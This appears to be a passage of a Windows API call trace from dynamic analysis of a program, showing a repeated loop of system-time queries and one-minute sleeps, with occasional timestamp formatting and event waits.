	[0238.275] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ba7a00, dwHighDateTime=0x1d50a6a)) 
	[0238.275] Sleep (dwMilliseconds=0xea60) 
	[0238.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75bcdb60, dwHighDateTime=0x1d50a6a)) 
	[0238.292] Sleep (dwMilliseconds=0xea60) 
	[0238.306] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75bf3cc0, dwHighDateTime=0x1d50a6a)) 
	[0238.306] Sleep (dwMilliseconds=0xea60) 
	[0238.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75c19e20, dwHighDateTime=0x1d50a6a)) 
	[0238.322] Sleep (dwMilliseconds=0xea60) 
	[0238.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75c3ff80, dwHighDateTime=0x1d50a6a)) 
	[0238.337] Sleep (dwMilliseconds=0xea60) 
	[0238.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75c660e0, dwHighDateTime=0x1d50a6a)) 
	[0238.354] Sleep (dwMilliseconds=0xea60) 
	[0238.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75c8c240, dwHighDateTime=0x1d50a6a)) 
	[0238.369] Sleep (dwMilliseconds=0xea60) 
	[0238.384] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75cb23a0, dwHighDateTime=0x1d50a6a)) 
	[0238.384] Sleep (dwMilliseconds=0xea60) 
	[0238.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75cd8500, dwHighDateTime=0x1d50a6a)) 
	[0238.400] Sleep (dwMilliseconds=0xea60) 
	[0238.416] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75cfe660, dwHighDateTime=0x1d50a6a)) 
	[0238.416] Sleep (dwMilliseconds=0xea60) 
	[0238.431] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75d247c0, dwHighDateTime=0x1d50a6a)) 
	[0238.431] Sleep (dwMilliseconds=0xea60) 
	[0238.446] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75d4a920, dwHighDateTime=0x1d50a6a)) 
	[0238.446] Sleep (dwMilliseconds=0xea60) 
	[0238.463] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75d70a80, dwHighDateTime=0x1d50a6a)) 
	[0238.463] Sleep (dwMilliseconds=0xea60) 
	[0238.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75d96be0, dwHighDateTime=0x1d50a6a)) 
	[0238.478] Sleep (dwMilliseconds=0xea60) 
	[0238.494] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75dbcd40, dwHighDateTime=0x1d50a6a)) 
	[0238.494] Sleep (dwMilliseconds=0xea60) 
	[0238.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75de2ea0, dwHighDateTime=0x1d50a6a)) 
	[0238.509] Sleep (dwMilliseconds=0xea60) 
	[0238.550] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75e2f160, dwHighDateTime=0x1d50a6a)) 
	[0238.550] Sleep (dwMilliseconds=0xea60) 
	[0238.556] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75e552c0, dwHighDateTime=0x1d50a6a)) 
	[0238.556] Sleep (dwMilliseconds=0xea60) 
	[0238.572] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75e7b420, dwHighDateTime=0x1d50a6a)) 
	[0238.572] Sleep (dwMilliseconds=0xea60) 
	[0238.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ea1580, dwHighDateTime=0x1d50a6a)) 
	[0238.587] Sleep (dwMilliseconds=0xea60) 
	[0238.603] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ec76e0, dwHighDateTime=0x1d50a6a)) 
	[0238.603] Sleep (dwMilliseconds=0xea60) 
	[0238.619] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75eed840, dwHighDateTime=0x1d50a6a)) 
	[0238.619] Sleep (dwMilliseconds=0xea60) 
	[0238.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75f139a0, dwHighDateTime=0x1d50a6a)) 
	[0238.636] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557884493\r\n") returned 12
	[0238.636] ResetEvent (hEvent=0xc) returned 1
	[0238.636] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0238.638] Sleep (dwMilliseconds=0xea60) 
	[0238.649] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75f39b00, dwHighDateTime=0x1d50a6a)) 
	[0238.649] Sleep (dwMilliseconds=0xea60) 
	[0238.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75f5fc60, dwHighDateTime=0x1d50a6a)) 
	[0238.665] Sleep (dwMilliseconds=0xea60) 
	[0238.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75f85dc0, dwHighDateTime=0x1d50a6a)) 
	[0238.681] Sleep (dwMilliseconds=0xea60) 
	[0238.696] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75fabf20, dwHighDateTime=0x1d50a6a)) 
	[0238.696] Sleep (dwMilliseconds=0xea60) 
	[0238.712] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75fd2080, dwHighDateTime=0x1d50a6a)) 
	[0238.712] Sleep (dwMilliseconds=0xea60) 
	[0238.727] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ff81e0, dwHighDateTime=0x1d50a6a)) 
	[0238.727] Sleep (dwMilliseconds=0xea60) 
	[0238.743] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7601e340, dwHighDateTime=0x1d50a6a)) 
	[0238.743] Sleep (dwMilliseconds=0xea60) 
	[0238.758] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x760444a0, dwHighDateTime=0x1d50a6a)) 
	[0238.758] Sleep (dwMilliseconds=0xea60) 
	[0238.775] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7606a600, dwHighDateTime=0x1d50a6a)) 
	[0238.775] Sleep (dwMilliseconds=0xea60) 
	[0238.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76090760, dwHighDateTime=0x1d50a6a)) 
	[0238.793] Sleep (dwMilliseconds=0xea60) 
	[0238.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x760b68c0, dwHighDateTime=0x1d50a6a)) 
	[0238.806] Sleep (dwMilliseconds=0xea60) 
	[0238.821] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x760dca20, dwHighDateTime=0x1d50a6a)) 
	[0238.821] Sleep (dwMilliseconds=0xea60) 
	[0238.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76102b80, dwHighDateTime=0x1d50a6a)) 
	[0238.837] Sleep (dwMilliseconds=0xea60) 
	[0238.852] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76128ce0, dwHighDateTime=0x1d50a6a)) 
	[0238.852] Sleep (dwMilliseconds=0xea60) 
	[0238.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7614ee40, dwHighDateTime=0x1d50a6a)) 
	[0238.868] Sleep (dwMilliseconds=0xea60) 
	[0238.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76174fa0, dwHighDateTime=0x1d50a6a)) 
	[0238.884] Sleep (dwMilliseconds=0xea60) 
	[0238.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7619b100, dwHighDateTime=0x1d50a6a)) 
	[0238.899] Sleep (dwMilliseconds=0xea60) 
	[0238.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x761c1260, dwHighDateTime=0x1d50a6a)) 
	[0238.915] Sleep (dwMilliseconds=0xea60) 
	[0238.930] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x761e73c0, dwHighDateTime=0x1d50a6a)) 
	[0238.930] Sleep (dwMilliseconds=0xea60) 
	[0238.946] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7620d520, dwHighDateTime=0x1d50a6a)) 
	[0238.946] Sleep (dwMilliseconds=0xea60) 
	[0238.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76233680, dwHighDateTime=0x1d50a6a)) 
	[0238.961] Sleep (dwMilliseconds=0xea60) 
	[0238.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x762597e0, dwHighDateTime=0x1d50a6a)) 
	[0238.977] Sleep (dwMilliseconds=0xea60) 
	[0238.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7627f940, dwHighDateTime=0x1d50a6a)) 
	[0238.993] Sleep (dwMilliseconds=0xea60) 
	[0239.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x762a5aa0, dwHighDateTime=0x1d50a6a)) 
	[0239.008] Sleep (dwMilliseconds=0xea60) 
	[0239.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x762cbc00, dwHighDateTime=0x1d50a6a)) 
	[0239.024] Sleep (dwMilliseconds=0xea60) 
	[0239.040] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x762f1d60, dwHighDateTime=0x1d50a6a)) 
	[0239.040] Sleep (dwMilliseconds=0xea60) 
	[0239.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76317ec0, dwHighDateTime=0x1d50a6a)) 
	[0239.055] Sleep (dwMilliseconds=0xea60) 
	[0239.071] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7633e020, dwHighDateTime=0x1d50a6a)) 
	[0239.071] Sleep (dwMilliseconds=0xea60) 
	[0239.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76364180, dwHighDateTime=0x1d50a6a)) 
	[0239.086] Sleep (dwMilliseconds=0xea60) 
	[0239.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7652d200, dwHighDateTime=0x1d50a6a)) 
	[0239.282] Sleep (dwMilliseconds=0xea60) 
	[0239.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76553360, dwHighDateTime=0x1d50a6a)) 
	[0239.289] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557886353\r\n") returned 12
	[0239.289] ResetEvent (hEvent=0xc) returned 1
	[0239.289] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0239.290] Sleep (dwMilliseconds=0xea60) 
	[0239.346] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x765c5780, dwHighDateTime=0x1d50a6a)) 
	[0239.346] Sleep (dwMilliseconds=0xea60) 
	[0239.352] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x765eb8e0, dwHighDateTime=0x1d50a6a)) 
	[0239.352] Sleep (dwMilliseconds=0xea60) 
	[0239.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76611a40, dwHighDateTime=0x1d50a6a)) 
	[0239.368] Sleep (dwMilliseconds=0xea60) 
	[0239.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76637ba0, dwHighDateTime=0x1d50a6a)) 
	[0239.383] Sleep (dwMilliseconds=0xea60) 
	[0239.398] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7665dd00, dwHighDateTime=0x1d50a6a)) 
	[0239.398] Sleep (dwMilliseconds=0xea60) 
	[0239.414] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76683e60, dwHighDateTime=0x1d50a6a)) 
	[0239.414] Sleep (dwMilliseconds=0xea60) 
	[0239.435] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x766a9fc0, dwHighDateTime=0x1d50a6a)) 
	[0239.435] Sleep (dwMilliseconds=0xea60) 
	[0239.445] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x766d0120, dwHighDateTime=0x1d50a6a)) 
	[0239.445] Sleep (dwMilliseconds=0xea60) 
	[0239.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x766f6280, dwHighDateTime=0x1d50a6a)) 
	[0239.460] Sleep (dwMilliseconds=0xea60) 
	[0239.476] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7671c3e0, dwHighDateTime=0x1d50a6a)) 
	[0239.476] Sleep (dwMilliseconds=0xea60) 
	[0239.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76742540, dwHighDateTime=0x1d50a6a)) 
	[0239.492] Sleep (dwMilliseconds=0xea60) 
	[0239.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x767686a0, dwHighDateTime=0x1d50a6a)) 
	[0239.509] Sleep (dwMilliseconds=0xea60) 
	[0239.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7678e800, dwHighDateTime=0x1d50a6a)) 
	[0239.523] Sleep (dwMilliseconds=0xea60) 
	[0239.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x767b4960, dwHighDateTime=0x1d50a6a)) 
	[0239.539] Sleep (dwMilliseconds=0xea60) 
	[0239.586] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76826d80, dwHighDateTime=0x1d50a6a)) 
	[0239.587] Sleep (dwMilliseconds=0xea60) 
	[0239.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7684cee0, dwHighDateTime=0x1d50a6a)) 
	[0239.601] Sleep (dwMilliseconds=0xea60) 
	[0239.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76873040, dwHighDateTime=0x1d50a6a)) 
	[0239.617] Sleep (dwMilliseconds=0xea60) 
	[0239.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x768991a0, dwHighDateTime=0x1d50a6a)) 
	[0239.633] Sleep (dwMilliseconds=0xea60) 
	[0239.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x768bf300, dwHighDateTime=0x1d50a6a)) 
	[0239.648] Sleep (dwMilliseconds=0xea60) 
	[0239.663] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x768e5460, dwHighDateTime=0x1d50a6a)) 
	[0239.663] Sleep (dwMilliseconds=0xea60) 
	[0239.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7690b5c0, dwHighDateTime=0x1d50a6a)) 
	[0239.679] Sleep (dwMilliseconds=0xea60) 
	[0239.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76931720, dwHighDateTime=0x1d50a6a)) 
	[0239.695] Sleep (dwMilliseconds=0xea60) 
	[0239.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76957880, dwHighDateTime=0x1d50a6a)) 
	[0239.710] Sleep (dwMilliseconds=0xea60) 
	[0239.726] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7697d9e0, dwHighDateTime=0x1d50a6a)) 
	[0239.726] Sleep (dwMilliseconds=0xea60) 
	[0239.741] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x769a3b40, dwHighDateTime=0x1d50a6a)) 
	[0239.741] Sleep (dwMilliseconds=0xea60) 
	[0239.757] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x769c9ca0, dwHighDateTime=0x1d50a6a)) 
	[0239.757] Sleep (dwMilliseconds=0xea60) 
	[0239.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x769efe00, dwHighDateTime=0x1d50a6a)) 
	[0239.773] Sleep (dwMilliseconds=0xea60) 
	[0239.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76a15f60, dwHighDateTime=0x1d50a6a)) 
	[0239.788] Sleep (dwMilliseconds=0xea60) 
	[0239.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76a3c0c0, dwHighDateTime=0x1d50a6a)) 
	[0239.804] Sleep (dwMilliseconds=0xea60) 
	[0239.820] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76a62220, dwHighDateTime=0x1d50a6a)) 
	[0239.820] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557888154\r\n") returned 12
	[0239.820] ResetEvent (hEvent=0xc) returned 1
	[0239.820] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0239.861] Sleep (dwMilliseconds=0xea60) 
	[0239.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) 
	[0239.866] Sleep (dwMilliseconds=0xea60) 
	[0239.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76afa7a0, dwHighDateTime=0x1d50a6a)) 
	[0239.882] Sleep (dwMilliseconds=0xea60) 
	[0239.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76b20900, dwHighDateTime=0x1d50a6a)) 
	[0239.897] Sleep (dwMilliseconds=0xea60) 
	[0239.921] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76b46a60, dwHighDateTime=0x1d50a6a)) 
	[0239.921] Sleep (dwMilliseconds=0xea60) 
	[0239.944] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76b92d20, dwHighDateTime=0x1d50a6a)) 
	[0239.944] Sleep (dwMilliseconds=0xea60) 
	[0239.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76bb8e80, dwHighDateTime=0x1d50a6a)) 
	[0239.962] Sleep (dwMilliseconds=0xea60) 
	[0239.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76bdefe0, dwHighDateTime=0x1d50a6a)) 
	[0239.976] Sleep (dwMilliseconds=0xea60) 
	[0239.991] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76c05140, dwHighDateTime=0x1d50a6a)) 
	[0239.991] Sleep (dwMilliseconds=0xea60) 
	[0240.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76c2b2a0, dwHighDateTime=0x1d50a6a)) 
	[0240.007] Sleep (dwMilliseconds=0xea60) 
	[0240.022] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76c51400, dwHighDateTime=0x1d50a6a)) 
	[0240.022] Sleep (dwMilliseconds=0xea60) 
	[0240.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76c77560, dwHighDateTime=0x1d50a6a)) 
	[0240.042] Sleep (dwMilliseconds=0xea60) 
	[0240.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76c9d6c0, dwHighDateTime=0x1d50a6a)) 
	[0240.055] Sleep (dwMilliseconds=0xea60) 
	[0240.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76cc3820, dwHighDateTime=0x1d50a6a)) 
	[0240.069] Sleep (dwMilliseconds=0xea60) 
	[0240.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76ce9980, dwHighDateTime=0x1d50a6a)) 
	[0240.084] Sleep (dwMilliseconds=0xea60) 
	[0240.106] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76d0fae0, dwHighDateTime=0x1d50a6a)) 
	[0240.106] Sleep (dwMilliseconds=0xea60) 
	[0240.116] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76d35c40, dwHighDateTime=0x1d50a6a)) 
	[0240.116] Sleep (dwMilliseconds=0xea60) 
	[0240.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76d5bda0, dwHighDateTime=0x1d50a6a)) 
	[0240.132] Sleep (dwMilliseconds=0xea60) 
	[0240.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76d81f00, dwHighDateTime=0x1d50a6a)) 
	[0240.149] Sleep (dwMilliseconds=0xea60) 
	[0240.163] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76da8060, dwHighDateTime=0x1d50a6a)) 
	[0240.163] Sleep (dwMilliseconds=0xea60) 
	[0240.197] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76df4320, dwHighDateTime=0x1d50a6a)) 
	[0240.198] Sleep (dwMilliseconds=0xea60) 
